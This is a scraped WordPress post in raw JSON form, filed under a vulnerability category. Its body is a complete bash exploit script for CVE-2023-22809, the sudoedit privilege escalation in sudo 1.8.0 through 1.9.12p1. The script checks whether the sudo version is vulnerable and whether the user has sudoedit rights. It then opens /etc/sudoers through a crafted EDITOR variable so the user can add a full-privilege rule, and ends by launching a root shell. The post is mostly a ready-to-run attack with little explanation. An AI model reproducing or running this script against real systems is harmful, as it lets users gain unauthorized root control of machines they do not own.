#!\/usr\/bin\/env bash<\/p>\n
# Exploit Title: sudo 1.8.0 to 1.9.12p1 – Privilege Escalation
\n# Exploit Author: n3m1.sys
\n# CVE: CVE-2023-22809
\n# Date: 2023\/01\/21
\n# Vendor Homepage: https:\/\/www.sudo.ws\/
\n# Software Link: https:\/\/www.sudo.ws\/dist\/sudo-1.9.12p1.tar.gz
\n# Version: 1.8.0 to 1.9.12p1
\n# Tested on: Ubuntu Server 22.04 – vim 8.2.4919 – sudo 1.9.9
\n#
\n# Git repository: https:\/\/github.com\/n3m1dotsys\/CVE-2023-22809-sudoedit-privesc
\n#
\n# Running this exploit on a vulnerable system allows a localiattacker to gain
\n# a root shell on the machine.
\n#
\n# The exploit checks if the current user has privileges to run sudoedit or
\n# sudo -e on a file as root. If so it will open the sudoers file for the
\n# attacker to add a line to gain privileges on all the files and get a root
\n# shell.<\/p>\n
if ! sudo –version | head -1 | grep -qE ‘(1\\.8.*|1\\.9\\.[0-9]1?(p[1-3])?|1\\.9\\.12p1)$’
\nthen
\necho “> Currently installed sudo version is not vulnerable”
\nexit 1
\nfi<\/p>\n
EXPLOITABLE=$(sudo -l | grep -E “sudoedit|sudo -e” | grep -E ‘\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)’ | cut -d ‘)’ -f 2-)<\/p>\n
if [ -z “$EXPLOITABLE” ]; then
\necho “> It doesn’t seem that this user can run sudoedit as root”
\nread -p “Do you want to proceed anyway? (y\/N): ” confirm && [[ $confirm == [yY] ]] || exit 2
\nelse
\necho “> BINGO! User exploitable”
\necho “> Opening sudoers file, please add the following line to the file in order to do the privesc:”
\necho “$( whoami ) ALL=(ALL:ALL) ALL”
\nread -n 1 -s -r -p “Press any key to continue…”
\nEDITOR=”vim — \/etc\/sudoers” $EXPLOITABLE
\nsudo su root
\nexit 0
\nfi<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/usr\/bin\/env bash # Exploit Title: sudo 1.8.0 to 1.9.12p1 – Privilege Escalation # Exploit Author: n3m1.sys # CVE: CVE-2023-22809 # Date: 2023\/01\/21 # Vendor Homepage: https:\/\/www.sudo.ws\/ # Software Link: https:\/\/www.sudo.ws\/dist\/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 – vim 8.2.4919 – sudo 1.9.9 # # Git repository: https:\/\/github.com\/n3m1dotsys\/CVE-2023-22809-sudoedit-privesc # # Running …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-39908","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39908","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=39908"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39908\/revisions"}],"predecessor-version":[{"id":40203,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39908\/revisions\/40203"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=39908"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=39908"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=39908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}